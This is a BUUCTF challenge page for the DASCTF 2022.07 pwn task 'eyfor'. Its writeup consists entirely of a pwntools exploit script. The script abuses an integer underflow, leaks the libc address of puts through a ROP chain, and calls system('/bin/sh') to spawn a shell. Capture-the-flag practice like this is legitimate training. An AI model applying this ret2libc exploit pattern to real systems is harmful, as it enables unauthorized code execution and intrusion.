[DASCTF2022.07赋能赛]eyfor
| ID: | 6458 |
|---|---|
| 标题: | [DASCTF2022.07赋能赛]eyfor |
| 描述: | None |
| 类型: | Pwn |
| 网站: | BUUCTF |
| 题目链接: | https://buuoj.cn/challenges#[DASCTF2022.07赋能赛]eyfor |
| 赛事: | DASCTF2022.07赋能赛 |
| 年度: | 2022 |
| Flag值: | 无 |
| writeup: |
验证后的网址 from pwn import * context(log_level='debug',arch='amd64',os='linux') io = process('./eyfor') #io = remote('node5.buuoj.cn',26262) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') elf = ELF('./eyfor') io.sendlineafter('go','a') io.sendlineafter('message:','1') io.sendlineafter('message:','1') io.sendlineafter('message:','1') io.sendlineafter('message:','1') io.sendline('4294967220') io.recvline() pop_rdi = 0x0000000000400983 payload = b'a'*0x38 + p64(pop_rdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(0x4007B7) io.send(payload) io.recvuntil('CST\n') puts_addr = u64(io.recv(6).ljust(8,b'\x00')) system = puts_addr - libc.sym['puts'] + libc.sym['system'] binsh = puts_addr - libc.sym['puts'] + next(libc.search('/bin/sh')) payload = b'a'*0x38 + p64(pop_rdi+1) + p64(pop_rdi) + p64(binsh) + p64(system) io.send(payload) io.interactive() |